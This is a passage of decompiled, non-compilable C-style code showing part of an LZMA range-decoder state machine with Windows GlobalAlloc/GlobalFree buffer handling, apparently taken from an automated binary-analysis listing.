                          													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t641 = _t641 - 1;
                          													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                          												} while (_t641 != 0);
                          												goto L12;
                          											}
                          											L6:
                          											if( *(_t644 - 4) != 0) {
                          												GlobalFree( *(_t644 - 4));
                          											}
                          											_t538 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t644 - 4) = _t538;
                          											if(_t538 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t644 - 0x6c);
                          											if( *(_t644 - 0x6c) == 0) {
                          												L157:
                          												 *(_t644 - 0x88) = 1;
                          												goto L170;
                          											}
                          											L14:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											_t45 = _t644 - 0x48;
                          											 *_t45 =  *(_t644 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t644 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											L16:
                          											_t550 =  *(_t644 - 0x40);
                          											if(_t550 ==  *(_t644 - 0x74)) {
                          												L20:
                          												 *(_t644 - 0x48) = 5;
                          												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											L17:
                          											 *(_t644 - 0x74) = _t550;
                          											if( *(_t644 - 8) != 0) {
                          												GlobalFree( *(_t644 - 8));
                          											}
                          											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                          											 *(_t644 - 8) = _t538;
                          											if(_t538 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                          											 *(_t644 - 0x84) = 6;
                          											 *(_t644 - 0x4c) = _t557;
                          											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                          											goto L132;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t644 - 0x6c);
                          											if( *(_t644 - 0x6c) == 0) {
                          												L158:
                          												 *(_t644 - 0x88) = 3;
                          												goto L170;
                          											}
                          											L22:
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											_t67 = _t644 - 0x70;
                          											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                          											if( *(_t644 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t559 =  *_t642;
                          											_t626 = _t559 & 0x0000ffff;
                          											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                          											if( *(_t644 - 0xc) >= _t596) {
                          												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                          												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                          												 *(_t644 - 0x40) = 1;
                          												_t560 = _t559 - (_t559 >> 5);
                          												__eflags = _t560;
                          												 *_t642 = _t560;
                          											} else {
                          												 *(_t644 - 0x10) = _t596;
                          												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                          												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                          											}
                          											if( *(_t644 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											} else {
                          												goto L137;
                          											}
                          										case 5:
                          											L137:
                          											if( *(_t644 - 0x6c) == 0) {
                          												L168:
                          												 *(_t644 - 0x88) = 5;
                          												goto L170;
                          											}
                          											L138:
                          											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                          											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                          											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                          											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                          											L139:
                          											_t537 =  *(_t644 - 0x84);
                          											L140:
                          											 *(_t644 - 0x88) = _t537;
                          											goto L1;
                          										case 6:
                          											L25:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L36:
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											L26:
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												L35:
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												L32:
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											L66:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												L68:
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          												__eax =  *(__ebp - 4);
                          												__eax =  *(__ebp - 4) + 0x664;
                          												__eflags = __eax;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L69;
                          											}
                          											L67:
                          											__eax =  *(__ebp - 4);
                          											__ecx =  *(__ebp - 0x38);
                          											 *(__ebp - 0x84) = 8;
                          											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          											goto L132;
                          										case 8:
                          											L70:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xa;
                          												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          											} else {
                          												__eax =  *(__ebp - 0x38);
                          												__ecx =  *(__ebp - 4);
                          												__eax =  *(__ebp - 0x38) + 0xf;
                          												 *(__ebp - 0x84) = 9;
                          												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          											}
                          											goto L132;
                          										case 9:
                          											L73:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												goto L90;
                          											}
                          											L74:
                          											__eflags =  *(__ebp - 0x60);
                          											if( *(__ebp - 0x60) == 0) {
                          												goto L171;
                          											}
                          											L75:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                          											__eflags = _t259;
                          											0 | _t259 = _t259 + _t259 + 9;
                          											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                          											goto L76;
                          										case 0xa:
                          											L82:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L84:
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x84) = 0xb;
                          												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											L83:
                          											__eax =  *(__ebp - 0x28);
                          											goto L89;
                          										case 0xb:
                          											L85:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__ecx =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x20);
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          											} else {
                          												__eax =  *(__ebp - 0x24);
                          											}
                          											__ecx =  *(__ebp - 0x28);
                          											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          											L89:
                          											__ecx =  *(__ebp - 0x2c);
                          											 *(__ebp - 0x2c) = __eax;
                          											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          											L90:
                          											__eax =  *(__ebp - 4);
                          											 *(__ebp - 0x80) = 0x15;
                          											__eax =  *(__ebp - 4) + 0xa68;
                          											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          											goto L69;
                          										case 0xc:
                          											L99:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L164:
                          												 *(__ebp - 0x88) = 0xc;
                          												goto L170;
                          											}
                          											L100:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t334 = __ebp - 0x70;
                          											 *_t334 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t334;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											__eax =  *(__ebp - 0x2c);
                          											goto L101;
                          										case 0xd:
                          											L37:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L159:
                          												 *(__ebp - 0x88) = 0xd;
                          												goto L170;
                          											}
                          											L38:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t122 = __ebp - 0x70;
                          											 *_t122 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t122;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L39:
                          											__eax =  *(__ebp - 0x40);
                          											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          												goto L48;
                          											}
                          											L40:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												goto L54;
                          											}
                          											L41:
                          											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          											 *(__ebp - 0x48) = __eax;
                          											__eax = __eax + 1;
                          											__eax = __eax << 8;
                          											__eax = __eax + __ebx;
                          											__esi =  *(__ebp - 0x58) + __eax * 2;
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edx = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												 *(__ebp - 0x40) = 1;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												__ebx = __ebx + __ebx + 1;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edx;
                          												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L39;
                          											} else {
                          												L45:
                          												goto L37;
                          											}
                          										case 0xe:
                          											L46:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L160:
                          												 *(__ebp - 0x88) = 0xe;
                          												goto L170;
                          											}
                          											L47:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t156 = __ebp - 0x70;
                          											 *_t156 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t156;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											while(1) {
                          												L48:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													break;
                          												}
                          												L49:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t170 = __edx + 1; // 0x1
                          													__ebx = _t170;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													continue;
                          												} else {
                          													L53:
                          													goto L46;
                          												}
                          											}
                          											L54:
                          											_t173 = __ebp - 0x34;
                          											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          											__eflags =  *_t173;
                          											goto L55;
                          										case 0xf:
                          											L58:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L161:
                          												 *(__ebp - 0x88) = 0xf;
                          												goto L170;
                          											}
                          											L59:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t203 = __ebp - 0x70;
                          											 *_t203 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t203;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											L60:
                          											__eflags = __ebx - 0x100;
                          											if(__ebx >= 0x100) {
                          												L55:
                          												__al =  *(__ebp - 0x44);
                          												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          												goto L56;
                          											}
                          											L61:
                          											__eax =  *(__ebp - 0x58);
                          											__edx = __ebx + __ebx;
                          											__ecx =  *(__ebp - 0x10);
                          											__esi = __edx + __eax;
                          											__ecx =  *(__ebp - 0x10) >> 0xb;
                          											__ax =  *__esi;
                          											 *(__ebp - 0x54) = __esi;
                          											__edi = __ax & 0x0000ffff;
                          											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          											__eflags =  *(__ebp - 0xc) - __ecx;
                          											if( *(__ebp - 0xc) >= __ecx) {
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          												__cx = __ax;
                          												_t217 = __edx + 1; // 0x1
                          												__ebx = _t217;
                          												__cx = __ax >> 5;
                          												__eflags = __eax;
                          												 *__esi = __ax;
                          											} else {
                          												 *(__ebp - 0x10) = __ecx;
                          												0x800 = 0x800 - __edi;
                          												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          												__ebx = __ebx + __ebx;
                          												 *__esi = __cx;
                          											}
                          											__eflags =  *(__ebp - 0x10) - 0x1000000;
                          											 *(__ebp - 0x44) = __ebx;
                          											if( *(__ebp - 0x10) >= 0x1000000) {
                          												goto L60;
                          											} else {
                          												L65:
                          												goto L58;
                          											}
                          										case 0x10:
                          											L109:
                          											__eflags =  *(__ebp - 0x6c);
                          											if( *(__ebp - 0x6c) == 0) {
                          												L165:
                          												 *(__ebp - 0x88) = 0x10;
                          												goto L170;
                          											}
                          											L110:
                          											__ecx =  *(__ebp - 0x70);
                          											__eax =  *(__ebp - 0xc);
                          											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											_t365 = __ebp - 0x70;
                          											 *_t365 =  *(__ebp - 0x70) + 1;
                          											__eflags =  *_t365;
                          											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          											goto L111;
                          										case 0x11:
                          											L69:
                          											__esi =  *(__ebp - 0x58);
                          											 *(__ebp - 0x84) = 0x12;
                          											goto L132;
                          										case 0x12:
                          											L128:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L131:
                          												__eax =  *(__ebp - 0x58);
                          												 *(__ebp - 0x84) = 0x13;
                          												__esi =  *(__ebp - 0x58) + 2;
                          												L132:
                          												 *(_t644 - 0x54) = _t642;
                          												goto L133;
                          											}
                          											L129:
                          											__eax =  *(__ebp - 0x4c);
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											__eflags = __eax;
                          											__eax =  *(__ebp - 0x58) + __eax + 4;
                          											goto L130;
                          										case 0x13:
                          											L141:
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												L143:
                          												_t469 = __ebp - 0x58;
                          												 *_t469 =  *(__ebp - 0x58) + 0x204;
                          												__eflags =  *_t469;
                          												 *(__ebp - 0x30) = 0x10;
                          												 *(__ebp - 0x40) = 8;
                          												L144:
                          												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                          												L145:
                          												 *(_t644 - 0x50) = 1;
                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          												goto L149;
                          											}
                          											L142:
                          											__eax =  *(__ebp - 0x4c);
                          											__ecx =  *(__ebp - 0x58);
                          											__eax =  *(__ebp - 0x4c) << 4;
                          											 *(__ebp - 0x30) = 8;
                          											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          											L130:
                          											 *(__ebp - 0x58) = __eax;
                          											 *(__ebp - 0x40) = 3;
                          											goto L144;
                          										case 0x14:
                          											L156:
                          											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          											__eax =  *(__ebp - 0x80);
                          											while(1) {
                          												L140:
                          												 *(_t644 - 0x88) = _t537;
                          												goto L1;
                          											}
                          										case 0x15:
                          											L91:
                          											__eax = 0;
                          											__eflags =  *(__ebp - 0x38) - 7;
                          											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          											__al = __al & 0x000000fd;
                          											__eax = (__eflags >= 0) - 1 + 0xb;
                          											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          											goto L120;
                          										case 0x16:
                          											goto L0;
                          										case 0x17:
                          											while(1) {
                          												L145:
                          												 *(_t644 - 0x50) = 1;
                          												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                          												goto L149;
                          											}
                          										case 0x18:
                          											goto L146;
                          										case 0x19:
                          											L94:
                          											__eflags = __ebx - 4;
                          											if(__ebx < 4) {
                          												L98:
                          												 *(__ebp - 0x2c) = __ebx;
                          												L119:
                          												_t393 = __ebp - 0x2c;
                          												 *_t393 =  *(__ebp - 0x2c) + 1;
                          												__eflags =  *_t393;
                          												L120:
                          												__eax =  *(__ebp - 0x2c);
                          												__eflags = __eax;
                          												if(__eax == 0) {
                          													L166:
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          													goto L170;
                          												}
                          												L121:
                          												__eflags = __eax -  *(__ebp - 0x60);
                          												if(__eax >  *(__ebp - 0x60)) {
                          													goto L171;
                          												}
                          												L122:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          												__eax =  *(__ebp - 0x30);
                          												_t400 = __ebp - 0x60;
                          												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          												__eflags =  *_t400;
                          												goto L123;
                          											}
                          											L95:
                          											__ecx = __ebx;
                          											__eax = __ebx;
                          											__ecx = __ebx >> 1;
                          											__eax = __ebx & 0x00000001;
                          											__ecx = (__ebx >> 1) - 1;
                          											__al = __al | 0x00000002;
                          											__eax = (__ebx & 0x00000001) << __cl;
                          											__eflags = __ebx - 0xe;
                          											 *(__ebp - 0x2c) = __eax;
                          											if(__ebx >= 0xe) {
                          												L97:
                          												__ebx = 0;
                          												 *(__ebp - 0x48) = __ecx;
                          												L102:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													L107:
                          													__eax = __eax + __ebx;
                          													 *(__ebp - 0x40) = 4;
                          													 *(__ebp - 0x2c) = __eax;
                          													__eax =  *(__ebp - 4);
                          													__eax =  *(__ebp - 4) + 0x644;
                          													__eflags = __eax;
                          													L108:
                          													__ebx = 0;
                          													 *(__ebp - 0x58) = __eax;
                          													 *(__ebp - 0x50) = 1;
                          													 *(__ebp - 0x44) = 0;
                          													 *(__ebp - 0x48) = 0;
                          													L112:
                          													__eax =  *(__ebp - 0x40);
                          													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          														L118:
                          														_t391 = __ebp - 0x2c;
                          														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          														__eflags =  *_t391;
                          														goto L119;
                          													}
                          													L113:
                          													__eax =  *(__ebp - 0x50);
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          													__eax =  *(__ebp - 0x58);
                          													__esi = __edi + __eax;
                          													 *(__ebp - 0x54) = __esi;
                          													__ax =  *__esi;
                          													__ecx = __ax & 0x0000ffff;
                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          													__eflags =  *(__ebp - 0xc) - __edx;
                          													if( *(__ebp - 0xc) >= __edx) {
                          														__ecx = 0;
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          														__ecx = 1;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          														__ebx = 1;
                          														__ecx =  *(__ebp - 0x48);
                          														__ebx = 1 << __cl;
                          														__ecx = 1 << __cl;
                          														__ebx =  *(__ebp - 0x44);
                          														__ebx =  *(__ebp - 0x44) | __ecx;
                          														__cx = __ax;
                          														__cx = __ax >> 5;
                          														__eax = __eax - __ecx;
                          														__edi = __edi + 1;
                          														__eflags = __edi;
                          														 *(__ebp - 0x44) = __ebx;
                          														 *__esi = __ax;
                          														 *(__ebp - 0x50) = __edi;
                          													} else {
                          														 *(__ebp - 0x10) = __edx;
                          														0x800 = 0x800 - __ecx;
                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          														 *__esi = __dx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L111:
                          														_t368 = __ebp - 0x48;
                          														 *_t368 =  *(__ebp - 0x48) + 1;
                          														__eflags =  *_t368;
                          														goto L112;
                          													} else {
                          														L117:
                          														goto L109;
                          													}
                          												}
                          												L103:
                          												__ecx =  *(__ebp - 0xc);
                          												__ebx = __ebx + __ebx;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L101:
                          													_t338 = __ebp - 0x48;
                          													 *_t338 =  *(__ebp - 0x48) - 1;
